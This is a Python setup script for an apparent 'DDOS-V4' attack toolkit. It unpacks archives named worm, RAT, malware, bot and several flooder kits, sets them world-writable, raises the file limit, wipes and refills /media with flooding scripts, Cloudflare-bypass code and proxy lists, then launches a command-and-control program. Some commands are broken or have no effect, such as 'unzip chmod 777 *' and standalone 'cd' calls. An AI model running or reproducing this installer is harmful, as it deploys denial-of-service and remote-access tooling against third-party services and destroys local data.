import os
print("""
               \033[37m           ,MMM\033[35m8&&&.
               \033[37m      _...MMMMM\033[35m88&&&&..._
               \033[37m   .::'''MMMMM8\033[35m8&&&&&&'''::.
               \033[37m  ::     MMMMM8\033[35m8&&&&&&     ::
               \033[37m  '::....MMMMM8\033[35m8&&&&&&....::'
               \033[37m     `''''MMMMM\033[35m88&&&&''''`
               \033[37m           'MMM\033[35m8&&&'
""")

print("""\33[0;32m[1] RUN\n[2] CANCEL\nWhich one do you use?""")

c = input(">>>: ")
if c == "1":
    os.system(f'rm -rf .randomstring')
    os.system(f'rm -rf .resources')
    os.system(f'rm -rf .godzilla')
    os.system(f'rm -rf .worm')
    os.system(f'rm -rf .RAT')
    os.system(f'rm -rf .bot')
    os.system(f'rm -rf .RATC')
    os.system(f'rm -rf .wormc')
    os.system(f'rm -rf .malware')
    os.system(f'rm -rf .TC1')
    os.system(f'rm -rf .TC2')
    os.system(f'rm -rf .BF')
    os.system(f'rm -rf .BF2')
    os.system(f'rm -rf .BF3')
    os.system(f'rm -rf .SUDAN')
    os.system(f'rm -rf .SUDANC')
    os.system(f'unzip bot.zip')
    os.system(f'rm -rf bot.zip')
    os.system(f'unzip RATC.zip')
    os.system(f'rm -rf RATC.zip')
    os.system(f'unzip wormc.zip')
    os.system(f'rm -rf wormc.zip')
    os.system(f'unzip malware.zip')
    os.system(f'rm -rf malware.zip')
    os.system(f'unzip randomstring.zip')
    os.system(f'rm -rf randomstring.zip')
    os.system(f'unzip resources.zip')
    os.system(f'rm -rf resources.zip')
    os.system(f'unzip godzilla.zip')
    os.system(f'rm -rf godzilla.zip')
    os.system(f'unzip worm.zip')
    os.system(f'rm -rf worm.zip')
    os.system(f'unzip RAT.zip')
    os.system(f'rm -rf RAT.zip')    
    os.system(f'unzip TC1.zip')
    os.system(f'rm -rf TC1.zip')
    os.system(f'unzip TC2.zip')
    os.system(f'rm -rf TC2.zip')
    os.system(f'unzip BF.zip')
    os.system(f'rm -rf BF.zip')
    os.system(f'unzip BF2.zip')
    os.system(f'rm -rf BF2.zip')
    os.system(f'unzip BF3.zip')
    os.system(f'rm -rf BF3.zip')
    os.system(f'unzip SUDAN.zip')
    os.system(f'rm -rf SUDAN.zip')
    os.system(f'unzip SUDANC.zip')
    os.system(f'rm -rf SUDANC.zip')
    os.system(f'mv randomstring .randomstring')
    os.system(f'mv resources .resources')
    os.system(f'mv godzilla .godzilla')
    os.system(f'mv worm .worm')
    os.system(f'mv RAT .RAT')
    os.system(f'mv bot .bot')
    os.system(f'mv RATC .RATC')
    os.system(f'mv wormc .wormc')
    os.system(f'mv malware .malware')
    os.system(f'mv TC1 .TC1')
    os.system(f'mv TC2 .TC2')
    os.system(f'mv BF .BF')
    os.system(f'mv BF2 .BF2')
    os.system(f'mv BF3 .BF3')
    os.system(f'mv SUDAN .SUDAN')
    os.system(f'mv SUDANC .SUDANC')
    os.system(f'cp node_modules.zip /root/DDOS-V4/.BF')
    os.system(f'cp node_modules.zip /root/DDOS-V4/.BF2')
    os.system(f'cp node_modules.zip /root/DDOS-V4/.BF3')
    os.system(f'cp node_modules.zip /root/DDOS-V4/.SUDAN')
    os.system(f'cp node_modules.zip /root/DDOS-V4/.SUDANC')
    os.system(f'cd .SUDAN && unzip node_modules.zip && rm -rf node_modules.zip')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDANC && unzip node_modules.zip && rm -rf node_modules.zip')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF && unzip node_modules.zip && rm -rf node_modules.zip')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF2 && unzip node_modules.zip && rm -rf node_modules.zip')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF3 && unzip node_modules.zip && rm -rf node_modules.zip')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && bash install.sh')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .godzilla && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .randomstring && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .worm && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .RAT && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .RATC && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .wormc && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .malware && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .TC1 && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .TC2 && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF2 && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF3 && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDAN && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDANC && ulimit -n 999999 && chmod 777 *')
    os.system("cd")
    os.system(f'cd /media && rm -rf *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF && cp BROWSER /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF && cp BROWSER3.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF2 && cp BROWSER1 /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF2 && cp BROWSER4.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF3 && cp BROWSER2.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF3 && cp hui.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .BF3 && cp BROWSER5.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .godzilla && cp HTTP.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .godzilla && cp HTTP-RAND.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .godzilla && cp tls /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .godzilla && cp tlsv2.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .randomstring && cp input.py /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .randomstring && cp referers.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .randomstring && cp screetvip /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDAN && cp OVER.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDAN && cp OVER2.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDAN && cp OVER3.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDANC && cp OVER4.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDANC && cp OVER5.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .SUDANC && cp OVER6.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .randomstring && cp user-agent.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .RAT && cp passkey /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp count.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp http.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp install.sh /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp ua.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp Hulk.go /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp Low.go /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp strike.go /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp RAW /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp TCP /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp requirements.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp uambypass.js /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp proxy.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp proxies.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp http.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cd .resources && cp socks5.txt /media')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system(f'cp node_modules.zip /media')
    os.system("cd")
    os.system(f'cd /media && unzip node_modules.zip')
    os.system("cd")
    os.system(f'cd /media && bash install.sh')
    os.system("cd")
    os.system(f'cd /media && rm -rf node_modules.zip')
    os.system("cd")
    os.system(f'cd /media && ulimit -n 999999')
    os.system("cd")
    os.system(f'cd /media && unzip chmod 777 *')
    os.system("cd")
    os.system("cd DDOS-V4")
    os.system("python3 cnc.py")

elif c == "2":
    os.system("clear")

print("\33[0;32m[ √ ] S U C C E S S F U L L Y")
